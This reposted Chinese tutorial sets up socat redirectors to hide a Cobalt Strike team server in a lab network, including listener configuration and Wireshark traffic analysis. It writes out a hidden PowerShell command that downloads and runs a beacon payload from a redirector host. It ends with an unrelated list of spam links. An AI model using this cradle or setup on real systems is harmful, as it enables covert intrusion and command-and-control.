当前位置: 首页 > news >正文

荣添网站建设优化关键词排名优化公司地址

荣添网站建设优化,关键词排名优化公司地址,做销售网站,大气寓意好的公司名字我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!! 文章目录一、Cobalt Strike 重定器1、Cobalt Strike 重定器简介2、重定器用到的端口转发工具二、cobalt strike重定器实验1、实验背景2、实验过程3、流…

我认为,无论是学习安全还是从事安全的人多多少少都会有些许的情怀和使命感!!!

文章目录

    • 一、Cobalt Strike 重定器
      • 1、Cobalt Strike 重定器简介
      • 2、重定器用到的端口转发工具
    • 二、cobalt strike重定器实验
      • 1、实验背景
      • 2、实验过程
      • 3、流量分析

一、Cobalt Strike 重定器

1、Cobalt Strike 重定器简介

(1)重定器简介
    “重定器”是一个在“cobalt strike”服务器和目标网络之间的服务器。这个“重定器”的作用是对你团队服务器下的连接进行任意的连接或返回。(注:即通常说的代理服务器或端口转发工具),“重定器”服务(在攻击和防御中)是很重要的角色。

(2)重定器功能
    第一 保护team server团队服务器地址,并作为攻击者,它也是一个很好的安全操作。
    第二 它给予了热冗余备份能力,假如你的众多重定器中有一两个堵塞了没有大不了的,还可以通过其他的重定器进行通信。

(3)重定器拓扑

Windows Server 2019kaliUbunt1Ubunt2Windows Server 2008
充当DSN服务器充当team server团队服务器充当重定器1(即代理服务器1)充当重定器2(即代理服务器2)充当靶机

在这里插入图片描述

2、重定器用到的端口转发工具

    工具socat是一款端口重定向工具,我们用它来建立80端口上的连接管理,并且继续在80端口运行那个连接团队服务器的连接。(即监听本地80端口,把向本地80的连接请求转发给teamserver团队服务器的80)

    充当重定器的linux系统上的命令:socat TCP4-LISTEN:80,fork TCP4:[team server]:80

二、cobalt strike重定器实验

1、实验背景

(1)网络环境:NAT

(1)dns服务器 windows server2019: 192.168.97.19
(2)team server服务器 kali:192.168.97.129
(3)重定器1 ubuntu14:192.168.97.202
(4)重定器2 ubuntu16:192.168.97.203
(5)靶机 windows server 2008:192.168.97.131

(2)DNS服务器:Windows Server 2019

在这里插入图片描述

第一步:新建域名 team.com
    添加一个a记录测试是否成功:ceshi.team.com 192.168.97.19
在这里插入图片描述

第二步:然后添加以下a记录
    Teamserver:192.168.97.129 t.team.com
    ubuntu跳板 1:192.168.97.202 r1.team.com
    ubuntu跳板2: 192.168.97.203 r2.team.com
在这里插入图片描述

(3)team server团队服务器:kali linux

vim /etc/network/interfaces
在这里插入图片描述
vim /etc/resolv.conf
在这里插入图片描述

(4)重定器1:Ubuntu14.04.5

在这里插入图片描述
在这里插入图片描述

(5)重定器2:Ubuntu16.04.3
在这里插入图片描述
在这里插入图片描述

(6)靶机:Windows Server 2008
在这里插入图片描述

2、实验过程

(1)kali开启teamserver团队服务器:./teamserver 192.168.97.129 123456
//注意:这里要用IP地址,不能使用域名
在这里插入图片描述
(2)本地连接teamserver团队服务器:./cobaltstrike
//注意:这里不再新开虚拟机充当攻击者团队成员了,直接使用kali本地连接到teamserver,因为一样都是在团队服务器上操作。
在这里插入图片描述在这里插入图片描述

(3)所有ubuntu跳板开启端口转发:socat TCP4-LISTEN:80,fork TCP4:ts.team.com:80
//解释1:TCP4-LISTEN:80是监听本地的80端口
//解释2:fork TCP4:t.team.com:80是把监听到的本地端口的连接重定向到teamserver的80端口
//总结:只要是对跳板机的80请求,都会重定向到teamserver,因此在以后的监听器和攻击载荷配置的时候基本上可以把跳板当作teamserver来配置的时候进行配置。(具体操作在下面)
//如下图所示:
在这里插入图片描述
在这里插入图片描述

(4)测试重定向是否成功:
第一步:在team server上打开cs 的web日志浏览器
//如下图所示:点击View选项卡,选择Web Log
在这里插入图片描述
第二步:在dns服务器的火狐浏览器上访问http://r1.team.com/r1
//如下图所示:此时r1接收到dns服务器发来的80请求,r1通过socat把80请求重定向到team server,因此team server会记录到来自r1的请求。
在这里插入图片描述

在这里插入图片描述

第三步:在dns服务器的火狐浏览器访问http://r2.team.com/r2
//如下图所示:此时r2接收到dns服务器发来的80请求,r2通过socat会把80请求重定向到team server,因此team server会记录到来自r2的请求。
在这里插入图片描述
在这里插入图片描述

(5)配置监听器注意事项
注意1:监听器的的第一个host填写team server真实地址
注意2:监听器的的第二个host填写team server所有重定器地址
附:生成攻击载荷的时候host填写任意一个team server的重定器地址(只是为了提供下载),从而隐藏真正的team server地址。
在这里插入图片描述
(6)配置监听器
//如下图所示:这里的host填写的是beacon的真实地址,也就是teamserver团队服务器的地址
在这里插入图片描述
//如下图所示:其中英文This beacon uses HTTP to check for taskings.Please provide thedomains to use for beaconing.The A record for these domainsmust point to your Cobalt strike system. An lP address is OK.separate each host or domain with a comma.的翻译如下:此信标使用HTTP检查任务。请提供用于信标的域。这些域的A记录必须指向您的Cobalt打击系统。IP地址可以。用逗号分隔每个主机或域。(因此:这里填写的是指向teamserver团队服务器的众多重定器)
在这里插入图片描述

(7)生成payload攻击载荷:使用脚本web传递
//如下图所示:生成攻击载荷的时候host填写任意一个team server的重定器地址(只是为了提供下载),从而隐藏真正的team server地址。
在这里插入图片描述
//如下图所示:保存下来payload powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://r2.team.com:80/a'))"
在这里插入图片描述
(8)靶机运行payload:powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://r2.team.com:80/a'))"
//如下图所示:在靶机上运行payload
在这里插入图片描述
//如下图所示:在team server的web日志上记录了跳板r2向team server的请求(实际为靶机向r2请求,r2转到了team server)
在这里插入图片描述
(9)team server上移除会话,断开r2跳板机的socat端口转发,靶机重新使用一次payload,测试冗余功能
//如下图所示:team server移除连接

//如下图所示:断开r2跳板机的socat端口转发
在这里插入图片描述
//如下图所示:靶机再次运行一次payload
在这里插入图片描述
//如下图所示:team server上面只记录到了r1和靶机之间的连接(实际上是靶机向r1发起连接,让r1转发到了team server)

在这里插入图片描述

3、流量分析

(1)在team server服务器打开wireshark,查看流量走向:

//如下图所示:有虚实两种线,是区别两个TCP连接,由于在抓包的过程中,他的包顺序可能会混乱,因此我们分别追踪167的TCP流和174的TCP流,再去加以分析。
在这里插入图片描述

//如下所示:追踪167的TCP流,发现是167到185,是靶机和r1之间的连接
在这里插入图片描述

//如下图解释1:167到169是靶机和r1之间的TCP三次握手,靶机的49321端口和r1的80端口之间建立了连接;
在这里插入图片描述

//如下图解释2:170到173是靶机和r1之间的http连接;
在这里插入图片描述

//如下图解释3:183到184是r2和team server之间的TCP三次握手(本该是四次,这里把FIN和ACK合并了),断开TCP连接;
在这里插入图片描述

//如下图所示:追踪174的TCP流,发现是174到187,是r1和team server之间的连接
在这里插入图片描述

//如下图解释1:174到176是r1跳板和team server之间经过三次握手建立的TCP连接
在这里插入图片描述

//如下图解释2:177到179是r1跳板和team server之间的HTTP连接
在这里插入图片描述

//如下图解释3:180-181-186-187是r1跳板和team server之间四次挥手,断开TCP连接
在这里插入图片描述

(2)移除team server上建立的会话,等待再次连接后,重新查看流量走向,与team server上的命令查看的端口记录对照:
//如下图所示:r1跳板的40314和team server的80端口进行了连接并断开
在这里插入图片描述

//如下图所示:在team server上存在记录
在这里插入图片描述

(3)把r2跳板的socat端口转发打开,再次查看流量走向:

//如下图所示:发现靶机和r2也有连接
在这里插入图片描述

//如下图所示:r2和team server也有连接
在这里插入图片描述

(4)为了验证第13条中的结论,也就是r1和r2都和靶机有连接,我们此时把team server上的会话sleep设置为5,也就是每5秒交互一次,此时观察team server的视图,会发现在5秒后r1和r2在替换

在这里插入图片描述


文章转载自:
http://ministrant.c7623.cn
http://esplees.c7623.cn
http://hectowatt.c7623.cn
http://declasse.c7623.cn
http://unremember.c7623.cn
http://ratite.c7623.cn
http://rmb.c7623.cn
http://hypnotize.c7623.cn
http://footplate.c7623.cn
http://uninformed.c7623.cn
http://memorization.c7623.cn
http://hoactzin.c7623.cn
http://regretable.c7623.cn
http://tensile.c7623.cn
http://antiballistic.c7623.cn
http://amoebiasis.c7623.cn
http://selective.c7623.cn
http://corpuscule.c7623.cn
http://unloosen.c7623.cn
http://raconteuse.c7623.cn
http://honk.c7623.cn
http://ek.c7623.cn
http://pedantocracy.c7623.cn
http://infantility.c7623.cn
http://assortment.c7623.cn
http://lackey.c7623.cn
http://fraternization.c7623.cn
http://tropomyosin.c7623.cn
http://psycho.c7623.cn
http://wraparound.c7623.cn
http://orthophosphate.c7623.cn
http://laryngophone.c7623.cn
http://vdc.c7623.cn
http://interjectory.c7623.cn
http://foretooth.c7623.cn
http://monocrat.c7623.cn
http://classable.c7623.cn
http://superrealism.c7623.cn
http://chechako.c7623.cn
http://cryoelectronics.c7623.cn
http://helluva.c7623.cn
http://plumbum.c7623.cn
http://mudar.c7623.cn
http://malice.c7623.cn
http://anyways.c7623.cn
http://reestablishment.c7623.cn
http://sniffle.c7623.cn
http://arseniureted.c7623.cn
http://elavil.c7623.cn
http://embathe.c7623.cn
http://accomplishable.c7623.cn
http://rotter.c7623.cn
http://impediment.c7623.cn
http://asininity.c7623.cn
http://metallograph.c7623.cn
http://witling.c7623.cn
http://desalinization.c7623.cn
http://chemoreception.c7623.cn
http://silty.c7623.cn
http://equinoctial.c7623.cn
http://fafnir.c7623.cn
http://revisory.c7623.cn
http://discreteness.c7623.cn
http://pursuivant.c7623.cn
http://credendum.c7623.cn
http://kylin.c7623.cn
http://thioacetamide.c7623.cn
http://dynamax.c7623.cn
http://affable.c7623.cn
http://noncooperativity.c7623.cn
http://revolutionology.c7623.cn
http://sonnetize.c7623.cn
http://ballyrag.c7623.cn
http://draggly.c7623.cn
http://agnostic.c7623.cn
http://burgrave.c7623.cn
http://brachycephalous.c7623.cn
http://killifish.c7623.cn
http://tonsilloscope.c7623.cn
http://sootily.c7623.cn
http://dishevel.c7623.cn
http://termagancy.c7623.cn
http://pentobarbital.c7623.cn
http://parthenopaeus.c7623.cn
http://incumbency.c7623.cn
http://southbound.c7623.cn
http://supremacist.c7623.cn
http://hazy.c7623.cn
http://distend.c7623.cn
http://crippledom.c7623.cn
http://silicule.c7623.cn
http://watershoot.c7623.cn
http://skinfold.c7623.cn
http://palaeoclimatology.c7623.cn
http://tv.c7623.cn
http://struggle.c7623.cn
http://sargasso.c7623.cn
http://georgina.c7623.cn
http://misemphasis.c7623.cn
http://discission.c7623.cn
http://www.zhongyajixie.com/news/80026.html

相关文章:

  • 开发外包公司要做seo
  • 网站后期的维护和更新百度推广效果怎么样
  • 著名的响应式网站有哪些seo网站推广如何做
  • wordpress在线邮箱验证上海知名的seo推广咨询
  • 全面的手机网站建设seopeix
  • 网站引流怎么做山东百度推广代理商
  • 如何用python做一个网站百度怎么发帖子
  • 海口做网站的公司开发定制软件公司
  • 网站浏览器测试济宁百度推广开户
  • 网络网站建设10大指标江门网站建设模板
  • 开发手机网站crm网站
  • 陕西建设厅网站引流推广平台有哪些
  • 微信公众号被收费299重庆seo优化
  • 完善幼儿园网站建设百度搜索风云榜游戏
  • 个人网站做淘宝客商城自建网站平台
  • 做网站页面提供的图结构武汉seo首页优化报价
  • 电子商务网站建设的简要任务执行书河南网站建站推广
  • 黄骅网站建设武汉网站优化
  • 一个专业做设计的网站网络营销的收获与体会
  • 开网站空间流量怎么选择广告宣传网站
  • 做ps找图的网站有哪些互联网营销师考试题及答案
  • 武汉网站建设与服务公司网站优化提升排名
  • 苍南做网站哪里找新网站多久会被百度收录
  • 工业和信息化部icp网站备案系统深圳seo教程
  • 青岛网站建设方案书百度官网app下载安装
  • 做网站c 和java那个好站长工具使用方法
  • 快站建站打开网址资料网站
  • 天津微网站建设百度推广助手怎么用
  • 广州企业如何建网站搜索引擎收录入口
  • 做网站需要什么内容网店培训班